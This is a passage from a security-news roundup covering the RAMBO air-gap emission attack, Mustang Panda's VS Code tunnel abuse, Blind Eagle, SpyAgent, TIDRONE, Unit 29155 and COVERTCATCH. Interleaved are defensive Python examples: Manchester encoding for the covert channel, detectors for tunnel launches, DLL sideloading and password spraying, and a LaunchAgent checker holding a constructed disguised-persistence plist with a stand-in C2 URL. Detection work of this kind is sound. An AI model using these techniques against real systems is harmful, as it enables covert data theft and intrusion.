Over the years, Dr. Guri has concocted various mechanisms to extract confidential data from offline networks by taking advantage of Serial ATA cables (SATAn), MEMS gyroscope (GAIROSCOPE), LEDs on network interface cards (ETHERLED), and dynamic power consumption (COVID-bit).
Some of the other unconventional approaches devised by the researcher entail leaking data from air-gapped networks via covert acoustic signals generated by graphics processing unit (GPU) fans (GPU-FAN), (ultra)sonic waves produced by built-in motherboard buzzers (EL-GRILLO), and even printer display panels and status LEDs (PrinterLeak).
Last year, Dr. Guri also demonstrated AirKeyLogger, a hardwareless radio frequency keylogging attack that weaponizes radio emissions from a computer's power supply to exfiltrate real-time keystroke data to a remote attacker.
"To leak confidential data, the processor's working frequencies are manipulated to generate a pattern of electromagnetic emissions from the power unit modulated by keystrokes," Dr. Guri noted in the study. "The keystroke information can be received at distances of several meters away via an RF receiver or a smartphone with a simple antenna."
As with all attacks of this kind, the air-gapped network must first be compromised through other means – such as a rogue insider, poisoned USB drives, or a supply chain attack – so that the malware can set up the covert data exfiltration channel.
RAMBO is no exception: the malware manipulates memory access so that the RAM bus radiates at its clock frequency, encodes the data onto those emissions using Manchester encoding, and transmits it so that it can be received from a distance.
The encoded data can include keystrokes, documents, and biometric information. An attacker on the other end can then leverage SDR to receive the electromagnetic signals, demodulate and decode the data, and retrieve the exfiltrated information.
"The malware utilizes electromagnetic emissions from the RAM to modulate the information and transmit it outward," Dr. Guri said. "A remote attacker with a radio receiver and antenna can receive the information, demodulate it, and decode it into its original binary or textual representation."
The technique could be used to leak data from air-gapped computers running Intel i7 3.6GHz CPUs and 16 GB RAM at 1,000 bits per second, the research found, with keystrokes being exfiltrated in real-time with 16 bits per key.
"A 4096-bit RSA encryption key can be exfiltrated at 41.96 sec at a low speed and 4.096 bits at a high speed," Dr. Guri said. "Biometric information, small files (.jpg), and small documents (.txt and .docx) require 400 seconds at the low speed to a few seconds at the fast speeds."
"This indicates that the RAMBO covert channel can be used to leak relatively brief information over a short period."
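The Manchester encoding mentioned above and the throughput figures just quoted are the two pieces of RAMBO a defender can reason about without any radio hardware. The following is an added example for this page, not Dr. Guri's code: it implements the bit-to-symbol layer (the physical side, driving memory so the bus radiates, is not reproduced) and the airtime arithmetic behind the paper's numbers, using the 1,000 bits per second and 16 bits per key stated above. The polarity chosen (1 -> high then low, 0 -> low then high) is one of the two standard conventions; the page does not say which one the paper uses.

```python
"""Manchester line coding as used by RAMBO to put bits onto RAM-bus
emissions, plus the airtime arithmetic behind the paper's figures. Added
example, not Dr. Guri's code; the symbol polarity is an assumption."""


def manchester_encode(data: bytes) -> list:
    """Expand each bit into a two-chip symbol with a guaranteed mid-bit
    transition, which is what lets a receiver recover the sender's clock
    from the emissions themselves instead of needing a shared clock."""
    chips = []
    for byte in data:
        for i in range(7, -1, -1):
            chips.extend((1, 0) if (byte >> i) & 1 else (0, 1))
    return chips


def manchester_decode(chips) -> bytes:
    """Invert manchester_encode. A symbol with no transition (00 or 11)
    means the receiver lost sync or sampled noise, so it is reported rather
    than guessed at."""
    if len(chips) % 16:
        raise ValueError("chip stream must hold whole bytes (16 chips each)")
    bits = []
    for a, b in zip(chips[0::2], chips[1::2]):
        if (a, b) == (1, 0):
            bits.append(1)
        elif (a, b) == (0, 1):
            bits.append(0)
        else:
            raise ValueError(f"invalid symbol {(a, b)}: no mid-bit transition")
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


def airtime_seconds(payload_bits: int, bit_rate_bps: float) -> float:
    """Seconds needed to push payload_bits at the channel's data rate.
    Manchester doubles the chip rate, but the data rate is what is quoted."""
    return payload_bits / bit_rate_bps


def keystrokes_per_second(bit_rate_bps: float, bits_per_key: int = 16) -> float:
    """Real-time keylogging budget at a given rate (16 bits per key above)."""
    return bit_rate_bps / bits_per_key


if __name__ == "__main__":
    payload = b"constructed sample payload"          # stand-in for a leaked key
    assert manchester_decode(manchester_encode(payload)) == payload
    print("4096-bit RSA key at 1,000 bps:", airtime_seconds(4096, 1000), "s")
    print("keystrokes/s at 1,000 bps:", keystrokes_per_second(1000))
```

The arithmetic is the useful part for threat modelling: at 1,000 bps a 4096-bit key crosses the gap in about four seconds and a keystroke stream in real time, which is why the countermeasures listed next focus on preventing the transmission (jamming, Faraday cages) rather than on noticing it afterwards.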
Countermeasures to block the attack include enforcing "red-black" zone restrictions for information transfer, using an intrusion detection system (IDS), monitoring hypervisor-level memory access, using radio jammers to block wireless communications, and using a Faraday cage.
Blind Eagle Targets Colombian Insurance Sector with Customized Quasar RAT
9.9.24 Virus The Hacker News
The Colombian insurance sector has been targeted since June 2024 by a threat actor tracked as Blind Eagle, with the end goal of delivering a customized version of a known commodity remote access trojan (RAT), Quasar RAT.
"Attacks have originated with phishing emails impersonating the Colombian tax authority," Zscaler ThreatLabz researcher Gaetano Pellegrino said in a new analysis published last week.
The advanced persistent threat (APT), also known as AguilaCiega, APT-C-36, and APT-Q-98, has a track record of focusing on organizations and individuals in South America, particularly related to the government and finance sectors in Colombia and Ecuador.
The attack chains, as recently documented by Kaspersky, originate with phishing emails that entice recipients into clicking on malicious links that serve as the launchpad for the infection process.
The links, either embedded within a PDF attachment or directly in the email body, point to ZIP archives hosted on a Google Drive folder associated with a compromised account that belongs to a regional government organization in Colombia.
"The lure used by Blind Eagle involved sending a notification to the victim, claiming to be a seizure order due to outstanding tax payments," Pellegrino noted. "This is intended to create a sense of urgency and pressure the victim into taking immediate action."
The archive contains a Quasar RAT variant dubbed BlotchyQuasar, which adds layers of obfuscation using tools such as DeepSea or ConfuserEx to hinder analysis and reverse engineering. It was previously detailed by IBM X-Force in July 2023.
The malware includes capabilities to log keystrokes, execute shell commands, steal data from web browsers and FTP clients, and monitor a victim's interactions with specific banking and payment services located in Colombia and Ecuador.
It also leverages Pastebin as a dead-drop resolver to fetch the command-and-control (C2) domain, with the threat actor leveraging Dynamic DNS (DDNS) services to host the C2 domain.
"Blind Eagle typically shields its infrastructure behind a combination of VPN nodes and compromised routers, primarily located in Colombia," Pellegrino said. "This attack demonstrates the continued use of this strategy."
Chinese Hackers Exploit Visual Studio Code in Southeast Asian Cyberattacks
9.9.24 APT The Hacker News
The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia.
"This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a report, describing it as a "relatively new technique" that was first demonstrated in September 2023 by Truvis Thornton.
The campaign is assessed to be a continuation of a previously documented attack activity aimed at an unnamed Southeast Asian government entity in late September 2023.
Mustang Panda, also known by the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, and Red Lich, has been operational since 2012, routinely conducting cyber espionage campaigns targeting government and religious entities across Europe and Asia, particularly those located in South China Sea countries.
The latest observed attack sequence is notable for its abuse of Visual Studio Code's reverse shell to execute arbitrary code and deliver additional payloads.
"To abuse Visual Studio Code for malicious purposes, an attacker can use the portable version of code.exe (the executable file for Visual Studio Code), or an already installed version of the software," Fakterman noted. "By running the command code.exe tunnel, an attacker receives a link that requires them to log into GitHub with their own account."
Once this step is complete, the attacker is redirected to a Visual Studio Code web environment that's connected to the infected machine, allowing them to run commands or create new files.
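The sequence just described leaves two observable traces on the endpoint: a `code` binary launched with the `tunnel` subcommand, and, shortly afterwards, a DNS lookup of the tunnel service that the GitHub-authenticated session connects through. The following hunting rule is an added example for this page, not Unit 42's code. The records are constructed tab-separated key=value lines in the spirit of Sysmon Event 1 (process create) and Event 22 (DNS query); the tunnel-service domain suffixes come from general knowledge of how VS Code Remote Tunnels work, not from the page, and should be checked against current Microsoft documentation before use.

```python
"""Hunting rule for the VS Code Remote Tunnel technique: a `code tunnel`
launch, corroborated by a DNS lookup of the tunnel service on the same
host within a short window. Added example, not Unit 42's code; event
layout, sample records and domain suffixes are assumptions."""
import re
from datetime import datetime, timedelta

TUNNEL_BINARIES = {"code.exe", "code", "code-tunnel.exe", "code-tunnel"}
TUNNEL_DOMAIN_SUFFIXES = (".tunnels.api.visualstudio.com", ".devtunnels.ms")
CORROBORATION_WINDOW = timedelta(minutes=5)


def parse(line: str) -> dict:
    """Parse one tab-separated key=value record (constructed layout)."""
    ev = dict(re.findall(r"(\w+)=([^\t]*)", line))
    ev["ts"] = datetime.fromisoformat(ev["UtcTime"])
    return ev


def is_tunnel_process(ev: dict) -> bool:
    """code.exe / code launched with the `tunnel` subcommand, the step that
    hands the attacker the GitHub device-login link."""
    if ev.get("EventID") != "1":
        return False
    image = ev.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    argv = ev.get("CommandLine", "").lower().split()
    return image in TUNNEL_BINARIES and "tunnel" in argv[1:]


def is_tunnel_dns(ev: dict) -> bool:
    if ev.get("EventID") != "22":
        return False
    name = ev.get("QueryName", "").lower().rstrip(".")
    return name.endswith(TUNNEL_DOMAIN_SUFFIXES)


def hunt(lines, allowlisted_users=frozenset()) -> list:
    """Return (host, user, confidence) per tunnel launch: 'high' when the
    same host resolved the tunnel service within CORROBORATION_WINDOW after
    the launch, 'medium' otherwise. Developers who legitimately use tunnels
    can be allowlisted by account name."""
    events = [parse(line) for line in lines if line.strip()]
    dns_by_host = {}
    for ev in events:
        if is_tunnel_dns(ev):
            dns_by_host.setdefault(ev["Computer"], []).append(ev["ts"])
    alerts = []
    for ev in events:
        if not is_tunnel_process(ev) or ev.get("User") in allowlisted_users:
            continue
        corroborated = any(
            timedelta(0) <= t - ev["ts"] <= CORROBORATION_WINDOW
            for t in dns_by_host.get(ev["Computer"], [])
        )
        alerts.append((ev["Computer"], ev.get("User"),
                       "high" if corroborated else "medium"))
    return alerts


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    "\t".join(["EventID=1", "UtcTime=2024-09-02T10:00:00", "Computer=GOV-WS01",
               "User=GOV\\jdoe", "Image=C:\\Users\\jdoe\\Downloads\\code.exe",
               "CommandLine=code.exe tunnel --accept-server-license-terms"]),
    "\t".join(["EventID=22", "UtcTime=2024-09-02T10:00:07", "Computer=GOV-WS01",
               "QueryName=global.rel.tunnels.api.visualstudio.com"]),
    "\t".join(["EventID=1", "UtcTime=2024-09-02T11:30:00", "Computer=DEV-WS07",
               "User=GOV\\dev1",
               "Image=C:\\Program Files\\Microsoft VS Code\\Code.exe",
               "CommandLine=\"C:\\Program Files\\Microsoft VS Code\\Code.exe\" --unity-launch"]),
    "\t".join(["EventID=1", "UtcTime=2024-09-02T12:00:00", "Computer=SRV-EX02",
               "User=NT AUTHORITY\\SYSTEM", "Image=C:\\ProgramData\\code.exe",
               "CommandLine=code.exe tunnel --name srv"]),
]

if __name__ == "__main__":
    for host, user, confidence in hunt(SAMPLE_EVENTS):
        print(f"{confidence}: VS Code tunnel launched on {host} by {user}")
```

The portable `code.exe` dropped into a user profile or ProgramData is the tell in the first and last sample: a normally installed editor launched from Program Files without `tunnel` is ignored, while a tunnel started as SYSTEM on a server with no developers on it is exactly the foothold the article describes.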
It's worth pointing out that the malicious use of this technique was previously highlighted by the Norwegian cybersecurity firm mnemonic in connection with zero-day exploitation of a vulnerability in Check Point's Network Security gateway products (CVE-2024-24919, CVSS score: 8.6) earlier this year.
Unit 42 said the Mustang Panda actor leveraged the mechanism to deliver malware, perform reconnaissance, and exfiltrate sensitive data. Furthermore, the attacker is said to have used OpenSSH to execute commands, transfer files, and spread across the network.
That's not all. A closer analysis of the infected environment has revealed a second cluster of activity "occurring simultaneously and at times even on the same endpoints" that utilized the ShadowPad malware, a modular backdoor widely shared by Chinese espionage groups.
It's currently unclear if these two intrusion sets are related to one another, or if two different groups are "piggybacking on each other's access."
"Based on the forensic evidence and timeline, one could conclude that these two clusters originated from the same threat actor (Stately Taurus)," Fakterman said. "However, there could be other possible explanations that can account for this connection, such as a collaborative effort between two Chinese APT threat actors."
Progress Software Issues Patch for Vulnerability in LoadMaster and MT Hypervisor
9.9.24 Vulnerability The Hacker News
Progress Software has released security updates for a maximum-severity flaw in LoadMaster and Multi-Tenant (MT) hypervisor that could result in the execution of arbitrary operating system commands.
Tracked as CVE-2024-7591 (CVSS score: 10.0), the vulnerability has been described as an improper input validation bug that results in OS command injection.
"It is possible for unauthenticated, remote attackers who have access to the management interface of LoadMaster to issue a carefully crafted http request that will allow arbitrary system commands to be executed," the company said in an advisory last week.
"This vulnerability has been closed by sanitizing request user input to mitigate arbitrary system commands execution."
The flaw affects the following versions -
LoadMaster (7.2.60.0 and all prior versions)
Multi-Tenant Hypervisor (7.1.35.11 and all prior versions)
Security researcher Florian Grunow has been credited with discovering and reporting the flaw. Progress said it has found no evidence of the vulnerability being exploited in the wild.
That said, it's recommended that users apply the latest fixes as soon as possible by downloading an add-on package. The update can be installed by navigating to System Configuration > System Administration > Update Software.
"We are encouraging all customers to upgrade their LoadMaster implementations as soon as possible to harden their environment," the company said. "We also strongly recommend that customers follow our security hardening guidelines."
New Android SpyAgent Malware Uses OCR to Steal Crypto Wallet Recovery Keys
9.9.24 Virus The Hacker News
Android device users in South Korea have emerged as a target of a new mobile malware campaign that delivers a new type of threat dubbed SpyAgent.
The malware "targets mnemonic keys by scanning for images on your device that might contain them," McAfee Labs researcher SangRyol Ryu said in an analysis, adding the targeting footprint has broadened in scope to include the U.K.
The campaign makes use of bogus Android apps that are disguised as seemingly legitimate banking, government facilities, streaming, and utility apps in an attempt to trick users into installing them. As many as 280 fake applications have been detected since the start of the year.
It all starts with SMS messages bearing booby-trapped links that urge users to download the apps in question in the form of APK files hosted on deceptive sites. Once installed, they are designed to request intrusive permissions to collect data from the devices.
This includes contacts, SMS messages, photos, and other device information, all of which is then exfiltrated to an external server under the threat actor's control.
The most notable feature is its ability to leverage optical character recognition (OCR) to steal mnemonic keys, which refer to a recovery or seed phrase that allows users to regain access to their cryptocurrency wallets.
Unauthorized access to the mnemonic keys could, therefore, allow threat actors to take control of the victims' wallets and siphon all the funds stored in them.
McAfee Labs said the command-and-control (C2) infrastructure suffered from serious security lapses that not only allowed navigating to the site's root directory without authentication, but also left exposed the gathered data from victims.
The server also hosts an administrator panel that acts as a one-stop shop to remotely commandeer the infected devices. The presence of an Apple iPhone device running iOS 15.8.2 with system language set to Simplified Chinese ("zh") in the panel is a sign that it may also be targeting iOS users.
"Originally, the malware communicated with its command-and-control (C2) server via simple HTTP requests," Ryu said. "While this method was effective, it was also relatively easy for security tools to track and block."
"In a significant tactical shift, the malware has now adopted WebSocket connections for its communications. This upgrade allows for more efficient, real-time, two-way interactions with the C2 server and helps it avoid detection by traditional HTTP-based network monitoring tools."
The development comes a little over a month after Group-IB exposed another Android remote access trojan (RAT) referred to as CraxsRAT targeting banking users in Malaysia since at least February 2024 using phishing websites. It's worth pointing out that CraxsRAT campaigns have also been previously found to have targeted Singapore no later than April 2023.
"CraxsRAT is a notorious malware family of Android Remote Administration Tools (RAT) that features remote device control and spyware capabilities, including keylogging, performing gestures, recording cameras, screens, and calls," the Singaporean company said.
"Victims that downloaded the apps containing CraxsRAT Android malware will experience credential leakage and illegitimate withdrawal of their funds."
TIDRONE Espionage Group Targets Taiwan Drone Makers in Cyber Campaign
9.9.24 BigBrothers The Hacker News
A previously undocumented threat actor with likely ties to Chinese-speaking groups has predominantly singled out drone manufacturers in Taiwan as part of a cyber attack campaign that commenced in 2024.
Trend Micro is tracking the adversary under the moniker TIDRONE, stating the activity is espionage-driven given the focus on military-related industry chains.
The exact initial access vector used to breach targets is presently unknown, with Trend Micro's analysis uncovering the deployment of custom malware such as CXCLNT and CLNTEND using remote desktop tools like UltraVNC.
An interesting commonality observed across different victims is the presence of the same enterprise resource planning (ERP) software, raising the possibility of a supply chain attack.
The attack chains subsequently go through three stages designed to facilitate privilege escalation by means of a User Account Control (UAC) bypass, credential dumping, and defense evasion by disabling antivirus products installed on the hosts.
Both backdoors are initiated by sideloading a rogue DLL via the Microsoft Word application, allowing the threat actors to harvest a wide range of sensitive information.
CXCLNT comes equipped with basic upload and download file capabilities, as well as features for clearing traces, collecting victim information such as file listings and computer names, and downloading next-stage portable executable (PE) and DLL files for execution.
CLNTEND, first detected in April 2024, is a remote access tool (RAT) that supports a wider range of network protocols for communication, including TCP, HTTP, HTTPS, TLS, and SMB (port 445).
"The consistency in file compilation times and the threat actor's operation time with other Chinese espionage-related activities supports the assessment that this campaign is likely being carried out by an as-yet unidentified Chinese-speaking threat group," security researchers Pierre Lee and Vickie Su said.
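Hunting for the Word-hosted DLL sideloading described above, as an added example that is not part of Trend Micro's report: the script walks Sysmon ImageLoad (Event ID 7) records and flags an Office process loading a DLL from outside the Windows and Program Files trees that is not Microsoft-signed. The records, paths and the list of host processes are constructed for illustration, not indicators from the campaign.

```python
"""Flag DLL sideloading through Office host processes in Sysmon ImageLoad (Event ID 7) records.

Added example for this page, not Trend Micro's code. Field names follow the Sysmon
ImageLoad schema (Image, ImageLoaded, Signed, Signature); the records, paths and the
process list are constructed for illustration.
"""
from pathlib import PureWindowsPath

# Office binaries commonly abused as sideloading hosts (assumption: extend per environment).
HOST_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Directory trees from which an Office process legitimately loads DLLs.
TRUSTED_DIR_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Signers accepted for a DLL that lives outside the trusted trees.
TRUSTED_SIGNERS = {"microsoft windows", "microsoft corporation"}


def is_sideload_candidate(event: dict) -> bool:
    """True when an Office host loads a non-Microsoft DLL from an unexpected directory."""
    host = PureWindowsPath(event["Image"]).name.lower()
    if host not in HOST_PROCESSES:
        return False
    loaded = event["ImageLoaded"].lower()
    if loaded.startswith(TRUSTED_DIR_PREFIXES):
        return False
    signed = event.get("Signed", "false").lower() == "true"
    signer = event.get("Signature", "").lower()
    # A Microsoft-signed DLL outside the trusted trees is unusual but not a sideload by itself.
    return not (signed and signer in TRUSTED_SIGNERS)


def hunt(events: list[dict]) -> list[str]:
    """Return the ImageLoaded path of every candidate, in log order."""
    return [e["ImageLoaded"] for e in events if is_sideload_candidate(e)]


# Constructed Sysmon Event ID 7 records (not from any real incident).
SAMPLE_EVENTS = [
    {   # Normal: Word loading a system DLL.
        "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "ImageLoaded": "C:\\Windows\\System32\\version.dll",
        "Signed": "true", "Signature": "Microsoft Windows",
    },
    {   # Sideload: Word loading an unsigned DLL from a user-writable temp path.
        "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "ImageLoaded": "C:\\Users\\analyst\\AppData\\Local\\Temp\\version.dll",
        "Signed": "false", "Signature": "",
    },
    {   # Not an Office host: ignored by this rule.
        "Image": "C:\\Users\\analyst\\Downloads\\tool.exe",
        "ImageLoaded": "C:\\Users\\analyst\\Downloads\\helper.dll",
        "Signed": "false", "Signature": "",
    },
]

if __name__ == "__main__":
    for path in hunt(SAMPLE_EVENTS):
        print("possible DLL sideload:", path)
```

The rule keys on the host process, so a copy of a signed Office binary staged in a temp directory next to its rogue DLL is only caught if that binary's name is in HOST_PROCESSES; in practice the list should be generated from the signed executables actually present in the estate, and the trusted-prefix check should be paired with a "DLL name already exists under System32" lookup to catch search-order hijacks of common names such as version.dll.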
U.S. Offers $10 Million for Info on Russian Cadet Blizzard Hackers Behind Major Attacks
9.9.24 BigBrothers The Hacker News
The U.S. government and a coalition of international partners have officially attributed a Russian hacking group tracked as Cadet Blizzard to the General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155).
"These cyber actors are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020," the agencies said.
"Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine."
The attacks have focused on critical infrastructure and key resource sectors, including government services, financial services, transportation systems, energy, and healthcare, across NATO members, the European Union, and Central American and Asian countries.
The joint advisory, released last week as part of a coordinated exercise dubbed Operation Toy Soldier, comes from cybersecurity and intelligence authorities in the U.S., the Netherlands, the Czech Republic, Germany, Estonia, Latvia, Ukraine, Canada, Australia, and the U.K.
Cadet Blizzard, also known as Ember Bear, FROZENVISTA, Nodaria, Ruinous Ursa, UAC-0056, and UNC2589, gained attention in January 2022 for deploying the destructive WhisperGate (aka PAYWIPE) malware against multiple Ukrainian victim organizations in advance of Russia's full-blown military invasion of the country.
Back in June 2024, a 22-year-old Russian national named Amin Timovich Stigal was indicted in the U.S. for his alleged role in staging destructive cyber attacks against Ukraine using the wiper malware. That said, the use of WhisperGate is said to be not unique to the group.
The U.S. Department of Justice (DoJ) has since charged five officers associated with Unit 29155 for conspiracy to commit computer intrusion and wire fraud conspiracy against targets in Ukraine, the U.S. and 25 other NATO countries.
The names of the five officers are listed below -
Yuriy Denisov (Юрий Денисов), a colonel in the Russian military and a commanding officer of Cyber Operations for Unit 29155
Vladislav Borovkov (Владислав Боровков), Denis Denisenko (Денис Денисенко), Dmitriy Goloshubov (Дима Голошубов), and Nikolay Korchagin (Николай Корчагин), lieutenants in the Russian military assigned to Unit 29155 who worked on cyber operations
"The defendants did so in order to sow concern among Ukrainian citizens regarding the safety of their government systems and personal data," the DoJ said. "The defendants' targets included Ukrainian Government systems and data with no military or defense-related roles. Later targets included computer systems in countries around the world that were providing support to Ukraine."
Concurrent with the indictment, the U.S. Department of State's Rewards for Justice program has announced a reward of up to $10 million for information on any of the defendants' locations or their malicious cyber activity.
Unit 29155 is assessed to be responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe, and has broadened its remit to include offensive cyber operations since at least 2020.
The end goal of these cyber intrusions is to collect sensitive information for espionage purposes, inflict reputational harm by leaking said data, and orchestrate destructive operations that aim to sabotage systems containing valuable data.
Unit 29155, per the advisory, is believed to comprise junior, active-duty GRU officers, who also rely on known cybercriminals and other civilian enablers such as Stigal to facilitate their missions.
Those operations comprise website defacements, infrastructure scanning, data exfiltration, and data leak operations that involve releasing the information on public website domains or selling it to other actors.
Attack chains commence with scanning activity that leverages known security flaws in Atlassian Confluence Server and Data Center, Dahua Security, and Sophos' firewall to breach victim environments, followed by using Impacket for post-exploitation and lateral movement, and ultimately exfiltrating data to dedicated infrastructure.
"Cyber actors may have used Raspberry Robin malware in the role of an access broker," the agencies noted. "Cyber actors targeted victims' Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords."
Organizations are recommended to prioritize routine system updates and remediate known exploited vulnerabilities, segment networks to prevent the spread of malicious activity, and enforce phishing-resistant multi-factor authentication (MFA) for all externally facing account services.
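The OWA password spraying noted in the advisory has a simple log signature: one source failing logins against many distinct accounts in a short window, unlike a brute-force attack that hammers one account. The following detection is an added example, not part of the joint advisory or any vendor's product; the log lines are constructed (timestamp, source IP, username, result) and a real OWA or IIS log needs its own parser in front of the same sliding-window logic.

```python
"""Detect password spraying against an OWA-style login from authentication logs.

Added example for this page, not part of the joint advisory. The log lines are
constructed; only parse_line() needs changing for a real log format.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.7 tries one password against many accounts (spray),
# 198.51.100.9 hammers a single account (brute force), and one login succeeds.
SAMPLE_LOG = """\
2024-09-09T10:00:01Z 203.0.113.7 alice Failure
2024-09-09T10:00:02Z 198.51.100.9 grace Failure
2024-09-09T10:00:03Z 203.0.113.7 bob Failure
2024-09-09T10:00:04Z 198.51.100.9 grace Failure
2024-09-09T10:00:05Z 203.0.113.7 carol Failure
2024-09-09T10:00:06Z 198.51.100.9 grace Failure
2024-09-09T10:00:07Z 203.0.113.7 dave Failure
2024-09-09T10:00:08Z 198.51.100.9 grace Failure
2024-09-09T10:00:09Z 203.0.113.7 erin Failure
2024-09-09T10:00:10Z 198.51.100.9 grace Failure
2024-09-09T10:00:11Z 203.0.113.7 frank Failure
2024-09-09T10:00:12Z 192.0.2.44 alice Success
"""


def parse_line(line: str):
    """Split one constructed log line into (timestamp, source IP, username, result)."""
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), ip, user, result


def detect_spray(lines, window=timedelta(minutes=10), min_users=5):
    """Alert once per source IP when it fails logins for >= min_users distinct accounts
    inside the sliding window. Lines are assumed to be in time order."""
    recent = defaultdict(deque)   # source IP -> deque of (timestamp, username) failures
    alerted = set()
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ts, ip, user, result = parse_line(line)
        if result != "Failure":
            continue
        failures = recent[ip]
        failures.append((ts, user))
        while ts - failures[0][0] > window:          # expire events older than the window
            failures.popleft()
        distinct = {u for _, u in failures}
        if len(distinct) >= min_users and ip not in alerted:
            alerted.add(ip)
            alerts.append({"src_ip": ip, "at": ts.isoformat(),
                           "distinct_users": len(distinct), "attempts": len(failures)})
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG.splitlines()):
        print(alert)
```

The brute-force source never alerts because its distinct-user count stays at one, which is the point of keying on users rather than on attempts. A per-IP window is defeated by sprays spread over many hours or rotated through proxy pools, so production rules also count distinct users per user-agent and per target tenant; the phishing-resistant MFA the advisory recommends is what removes the payoff even when a spray finds a valid password.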
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams
8.9.24 APT The Hacker News
Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation.
These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector.
"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge," researchers Robert Wallace, Blas Kojusner, and Joseph Dobson said.
The malware functions as a launchpad to compromise the target's macOS system by downloading a second-stage payload that establishes persistence via Launch Agents and Launch Daemons.
It's worth pointing out that this is one of many activity clusters – namely Operation Dream Job, Contagious Interview, and others – undertaken by North Korean hacking groups that make use of job-related decoys to infect targets with malware.
Recruiting-themed lures have also been a prevalent tactic to deliver malware families such as RustBucket and KANDYKORN. It's currently not clear if COVERTCATCH has any connection to these strains, or the newly identified TodoSwift.
Mandiant said it observed a social engineering campaign that delivered a malicious PDF disguised as a job description for a "VP of Finance and Operations" at a prominent cryptocurrency exchange.
"The malicious PDF dropped a second-stage malware known as RustBucket, which is a backdoor written in Rust that supports file execution."
The RustBucket implant is equipped to harvest basic system information, communicate with a URL provided via the command-line, and set up persistence using a Launch Agent that disguises itself as a "Safari Update" in order to contact a hard-coded command-and-control (C2) domain.
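A triage check for LaunchAgent persistence of the kind described above, as an added example that is not Mandiant's tooling: it parses a launchd property list and flags an Apple-branded label pointing at a program outside Apple's trees, a program staged in a hidden or temporary directory, the RunAtLoad plus KeepAlive combination, and a URL passed on the command line. Both plists, the label, the path and the URL are constructed to resemble the disguise in the text and are not indicators from a real sample.

```python
"""Triage macOS LaunchAgent plists for persistence that masquerades as Apple software.

Added example for this page, not Mandiant's code. The plists, label, path and URL
below are constructed; they are not indicators from any real sample.
"""
import plistlib
from pathlib import PurePosixPath

# Trees where a genuinely Apple-branded program would live (assumption).
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/", "/Applications/Safari.app/", "/Library/Apple/")
# Staging locations favoured by droppers (assumption).
SUSPICIOUS_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
APPLE_WORDS = ("com.apple.", "apple", "safari")


def program_path(plist: dict) -> str:
    """launchd accepts either Program or ProgramArguments[0]."""
    return plist.get("Program") or (plist.get("ProgramArguments") or [""])[0]


def assess_launch_agent(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    plist = plistlib.loads(data)
    label = str(plist.get("Label", "")).lower()
    prog = program_path(plist)
    findings = []
    if any(w in label for w in APPLE_WORDS) and not prog.startswith(APPLE_PROGRAM_PREFIXES):
        findings.append(f"apple-branded label {label!r} runs non-Apple path {prog}")
    parts = PurePosixPath(prog).parts
    if prog.startswith(SUSPICIOUS_PREFIXES) or any(p.startswith(".") for p in parts):
        findings.append(f"program in staging or hidden directory: {prog}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: restarts on login and on exit")
    args = plist.get("ProgramArguments", [])[1:]
    if any(a.startswith(("http://", "https://")) for a in args):
        findings.append(f"URL passed on the command line: {args}")
    return findings


# Constructed plists: the first mimics the "Safari Update" disguise, the second is a
# typical third-party agent that should not fire.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.safariupdate</string>
  <key>ProgramArguments</key><array>
    <string>/Users/dev/Library/Application Support/.cache/SafariUpdate</string>
    <string>https://updates.example.invalid/check</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>org.example.backup-agent</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/BackupTool.app/Contents/MacOS/agent</string>
    <string>--daemon</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, data in (("suspect", SUSPECT_PLIST), ("benign", BENIGN_PLIST)):
        print(name, assess_launch_agent(data) or ["no findings"])
```

Run it over ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons (the page names both Launch Agents and Launch Daemons as the persistence points); binary plists parse the same way, since plistlib.loads detects the format. The heuristics are deliberately coarse, and the code-signing identity of the program is the next check to add, because a real Apple component is signed by Apple and an impostor rarely is.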
